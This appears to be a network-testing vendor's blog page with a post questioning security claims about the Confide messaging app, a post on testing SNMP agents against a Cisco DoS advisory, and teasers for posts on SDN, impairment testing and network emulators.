Confide, a Favorite App of the White House, May Not Be Secure

A New York City based start-up company, Confide, offers a text messaging system “with encrypted messages that self-destruct.”  You can download the app at https://getconfide.com/

Confide lets its users “discuss sensitive topics, brainstorm ideas or give unfiltered opinions without fear of the Internet’s permanent, digital record and with no copies left behind.”  “Messages disappear forever after they are read once, making them as private and secure as the spoken word.”

What a description!  Everyone’s dream come true, right?  Certainly a perfect app for individuals wanting to communicate about classified information, military plans, or other top secret information.

It is no surprise, then, that Donald Trump and members of the White House staff allegedly use the Confide text messaging app.

Is Confide really secure?

An article in CyberScoop, an online cybersecurity news site, asserts that many of the claims made by Confide are not valid: https://www.cyberscoop.com/confide-favorite-app-trumps-white-house-triumph-marketing-substance/

Which security protocol:  SSL or TLS 1.2

First, it is unclear if the Confide application uses SSL 3.0 (Secure Sockets Layer) or its more robust and secure successor, TLS 1.2 (Transport Layer Security version 1.2) 1

The author cites a security researcher:

“To encrypt messages, Confide uses OpenSSL …  The OpenSSL version the app may use, 1.1.f, dates back to January 2014 and has been obsolete and broken for years.  …  The full scope of facts on how Confide works are not yet entirely clear due to the lack of transparency.”

Note the use of the word “may” above.  No one knows for certain (except for the Confide software engineers) the protocol version used by the Confide app.

While it is certainly true the earlier versions of OpenSSL contained flaws, vulnerabilities and weaknesses, the most recent version of the OpenSSL library also implements TLS.  Thus, the Confide app would be “TLS capable”.  Furthermore, if the apps only ever speak to each other, then it is very easy for the programmers to force the apps to select only TLS 1.2 and the cipher suites of their choice.

Man in the Middle Attacks (MITM)2

The author also cites another security researcher:
“The whole point about TLS is that it can be attacked by man-in-the-middle attacks.”

However, the cited articles concerning MITM attacks do not seem to support this claim. The MITM tools referenced in the article did not actually attack TLS.  None of them would have necessarily been useful or relevant to a specialized app like Confide.

All applications that fail to perform the critical step of validating credentials are vulnerable to MITM.  The article suggests that TLS is somehow unique in this property; it is not.

Of course any security protocol can be implemented improperly.   That’s why we recommend using the Maxwell Pro TLS Test Suite.

Test engineers use the Maxwell Pro TLS Test Suite to find and fix bugs in their TLS stack or engine. The tests help ensure that the TLS implementation is sufficiently robust so that it is not vulnerable to the wide range of attacks in today’s Internet.

IWL encourages the Confide staff to be more forthcoming and transparent with the technologies incorporated in the Confide app, and to perform exhaustive testing and report on the results.

Footnote 1:  Definition of TLS – Transport Layer Security:  https://en.wikipedia.org/wiki/Transport_Layer_Security

Footnote 2:  Definition of a MITM – Man In the Middle Attack:  https://en.wikipedia.org/wiki/Man-in-the-middle_attack

Simple illustration of how MITM attacks work:  https://wordtothewise.com/2014/09/cryptography-alice-bob/

Checking for New SNMP Vulnerabilities

Cisco Systems recently announced a patch for a vulnerability in Simple Network Management Protocol (SNMP) functions of some Cisco routers.  “This vulnerability could allow an authenticated, remote attacker to cause high CPU usage on an affected device, resulting in a denial of service (DoS) condition. The vulnerability is due to an incorrect initialized variable. An attacker could exploit this vulnerability by performing SNMP polling on MIBs and using only Interface Index (ifIndex) values. A successful exploit could allow the attacker to increase CPU usage to 99% on an affected device and cause a DoS condition.” 1

Whether or not you have Cisco routers, it is important to execute all the SNMP vulnerability tests in SilverCreek to verify that your SNMP agent is not vulnerable to attacks.

For this particular vulnerability, you can use the SilverCreek Memory Leak Tool to test your agent.

Start up SilverCreek and select an SNMP agent to test.  Once SilverCreek has connected to the agent  (device under test), start the Memory Leak Tool.

Select the ifIndex value to poll for one hour or more.  No poll interval is needed; the Tool will send poll requests repeatedly.

The Memory Leak Tool will detect and print out the memory usage and cpu usage.

By continuously polling ifIndex variable, the agent will stop responding and the user should notice there is no response coming back because a DoS (Denial of Service) is triggered!

The results of this test will help you characterize the performance of your agent and its susceptibility to this particular vulnerability.

 

 (1)  Source:  https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170201-asrsnmp

More on SDN Complexity and Reality

SDN:  Software Defined Networks

SDN Complexity and Reality” by Russ White and Shawn Zandi, was published on page 31 of The Internet Protocol Journal, November 2016 (Volume 19, Number 3).  You can download ipj19-3.pdf at http://ipj.dreamhosters.com/.

In the article, White and Zandi, examine the original three crucial elements to the SDN story:

First, SDNs were supposed to remove the intelligence from the distributed control planes and consolidate that intelligence in a centralized controller.

Continue reading More on SDN Complexity and Reality

Why You Should Care About Impairment Testing of Internet Protocols

 

The Internet Is An Imperfect and Hostile Place

The world is an imperfect place.  The internet is no exception.  The internet has its good days and it has its bad days.  Or to be more precise, the internet has its good seconds and its bad seconds.

Blemishes in internet performance arise from many sources. Continue reading Why You Should Care About Impairment Testing of Internet Protocols

Waveforms in KMAX

Real network conditions are rarely static.  Real life networks suffer transient conditions – congestion builds up and dissipates, tree branches wave in the wind across radio links, long distance routing paths change, VoIP call trunks are filled with more calls during working hours than during the evening.  Even something as small as a person standing near a wi-fi access point can change the carrying capacity of a network.

KMAX (and our Maxwell Pro) can emulate these kinds of changes.

Continue reading Waveforms in KMAX

ESP8266/NodeMCU TCP Test Reveals Issues

The ESP8266 is very popular among the maker set as a platform for experimentation in the realm of Internet of Things (IoT).

We have been playing around with the ESP8622 micro-controller running NodeMCU.  We’ve been loading simple LUA programs onto the ESP8266 to get familiar with its capabilities.

Now that we’re reasonably familiar with its capabilities, it’s time we put ESP8266/NodeMCU to test.
Continue reading ESP8266/NodeMCU TCP Test Reveals Issues

New Cloud Testing Paradigm Comes With Challenges that Network Emulators Can Solve

cloud testing

Cloud computing has taken hold of the business world, nearly reaching its saturation point according to multiple industry reports. The business cloud and its cloud testing capabilities are growing at an extremely fast pace due to scalability, adaptability, cost-effectiveness, and efficiency across nearly every industry.
Continue reading New Cloud Testing Paradigm Comes With Challenges that Network Emulators Can Solve